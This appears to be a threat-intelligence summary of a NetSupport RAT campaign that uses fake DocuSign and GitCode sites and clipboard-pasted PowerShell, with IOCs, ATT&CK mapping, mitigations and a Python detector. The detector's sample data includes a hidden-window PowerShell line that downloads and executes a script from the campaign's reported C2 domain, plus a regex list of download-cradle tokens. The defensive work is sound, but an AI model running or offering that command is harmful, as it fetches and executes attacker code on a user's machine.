Full Report
Threat hunters are alerting to a new campaign that employs deceptive websites to trick unsuspecting users into executing malicious PowerShell scripts on their machines and infect them with the NetSupport RAT malware. The DomainTools Investigations (DTI) team said it identified "malicious multi-stage downloader Powershell scripts" hosted on lure websites that masquerade as Gitcode and DocuSign.
Analysis Summary
# Tool/Technique: NetSupport RAT (Remote Access Trojan)
## Overview
NetSupport RAT is the final payload delivered via a multi-stage attack involving deceptive websites impersonating DocuSign and GitCode. The initial infection vector relies on luring victims into executing complex, obfuscated PowerShell scripts downloaded from these fraudulent sites.
## Technical Details
- Type: Malware Family (Remote Access Trojan)
- Platform: Windows (Implied by use of PowerShell and Windows Run command)
- Capabilities: Remote control, file system access, persistence establishment.
- First Seen: Not stated in the source report, but the campaign that delivers it is recent.
## MITRE ATT&CK Mapping
*Note: Mappings are based on the described delivery mechanism and the nature of a RAT.*
- **TA0002 - Execution**
- T1059.001 - Command and Scripting Interpreter: PowerShell
- **TA0003 - Persistence**
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (Implied by persistence script `wbdims.exe`)
- **TA0011 - Command and Control**
- T1071.001 - Application Layer Protocol: Web Protocols
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information (Used in PowerShell scripts)
## Functionality
### Core Capabilities
- Remote Access and Control via the NetSupport RAT payload.
- Establishing persistence on the host system using a downloaded script (`wbdims.exe`).
### Advanced Features
The delivery mechanism exhibits advanced chaining and evasion techniques:
1. **Multi-Stage PowerShell Downloaders:** Successive layered PowerShell scripts are executed, each downloading and launching the next stage to obfuscate the final payload source.
2. **Clipboard Poisoning (DocuSign variant):** A simulated CAPTCHA verification page silently copies a malicious PowerShell command to the victim's clipboard and then instructs them to paste and run it in the 'Win + R' dialog.
## Indicators of Compromise
- File Hashes: N/A (None provided in the text)
- File Names: `wbdims.exe` (Persistence script), `jp2launcher.exe` (Executable deployed from the final ZIP payload)
- Registry Keys: N/A (Persistence mechanism likely involved a Run key, but specific key path is not detailed)
- Network Indicators:
- `tradingviewtool[.]com` (C2/Download server for intermediate scripts)
- `docusign[.]sa[.]com/verification/c.php` (C2 endpoint for persistence check-in)
- `docusign[.]sa[.]com/verification/s.php?an=1` (C2 endpoint for second-stage script delivery)
- Behavioral Indicators: Execution of PowerShell scripts initiated via the Windows Run dialog (`Win + R`), downloading subsequent scripts hosted on potentially malicious domains, and subsequent deployment of an executable named `jp2launcher.exe`.
## Associated Threat Actors
The specific threat actor group is not named in the source report, but the methods described are associated with sophisticated campaigns that use widely available RATs.
## Detection Methods
- Signature-based detection: Signatures for the NetSupport RAT executable and potentially for the persistence file `wbdims.exe` or the final payload.
- Behavioral detection: Monitoring for chained PowerShell execution initiated by user interaction (like pasting via Run command), especially scripts contacting C2 domains like `tradingviewtool[.]com` or `docusign[.]sa[.]com`.
- YARA rules: Potential YARA rules targeting known strings or binary artifacts associated with NetSupport RAT.
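As an added detection example (not code from the DomainTools report), the following Python scores process-creation events for the combination the report describes: PowerShell launched from `explorer.exe` (the Run dialog), a download cradle or hidden-window flag in the command line, and contact with one of the listed domains. The event records are constructed for illustration; field names follow Sysmon Event ID 1.

```python
# Added example (not from the DomainTools report): detector for the chain
# described above, run over constructed process-creation events (Sysmon
# Event ID 1-style field names; the records themselves are invented).
import re

# Domains named in the report, de-fanged as printed there.
C2_DOMAINS = ("tradingviewtool[.]com", "docusign[.]sa[.]com")

# Download-cradle and hidden-window tokens typical of staged PowerShell downloaders.
CRADLE_RE = re.compile(
    r"invoke-expression|\biex\b|downloadstring|invoke-webrequest|\biwr\b"
    r"|-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden|frombase64string",
    re.IGNORECASE,
)

def score_event(ev):
    """Return (score, reasons) for one process-creation event dict."""
    reasons = []
    cmd = ev.get("CommandLine", "").lower()
    if not ev.get("Image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, reasons
    # A command pasted into Win+R shows up as explorer.exe -> powershell.exe.
    if ev.get("ParentImage", "").lower().endswith("explorer.exe"):
        reasons.append("powershell spawned by explorer.exe (Run dialog)")
    if CRADLE_RE.search(cmd):
        reasons.append("download cradle / hidden window in command line")
    for d in C2_DOMAINS:
        if d.replace("[.]", ".") in cmd:
            reasons.append(f"contacts reported domain {d}")
    return len(reasons), reasons

def triage(events, threshold=2):
    """Return events scoring at or above threshold, with their reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"pid": ev["ProcessId"], "score": score, "reasons": reasons})
    return hits

# Constructed samples: a scheduled admin script, then a ClickFix-style launch.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\nightly-backup.ps1"},
    {"ProcessId": 5380, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr https://docusign.sa.com/verification/s.php?an=1)"'},
]
```

Requiring two of the three signals keeps routine scheduled or interactive PowerShell out of the alert queue while still flagging a pasted cradle even before a known domain is involved.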
## Mitigation Strategies
- **User Awareness:** Training users to be highly skeptical of unexpected links, especially those promising document access (DocuSign) or code repositories (GitCode), and warning against running commands copied from websites.
- **Application Control:** Restricting PowerShell execution from unexpected locations or launch paths (for example, commands pasted into the Run box rather than started by a managed script or tool).
- **Network Filtering:** Blocking connections to the identified C2 domains (`tradingviewtool[.]com`, `docusign[.]sa[.]com`).
- **Endpoint Hardening:** Implementing robust real-time monitoring for persistence mechanisms (e.g., monitoring for changes to common autostart locations).
## Related Tools/Techniques
- **EDDIESTEALER infostealer:** Mentioned as being delivered via similar ClickFix-style phishing attack chains, indicating either a shared attacker methodology or a common provider of the initial-access lures.
- **ClickFix CAPTCHA mechanism:** Used in the DocuSign variant to trick users into executing commands, demonstrating a shared social engineering lure.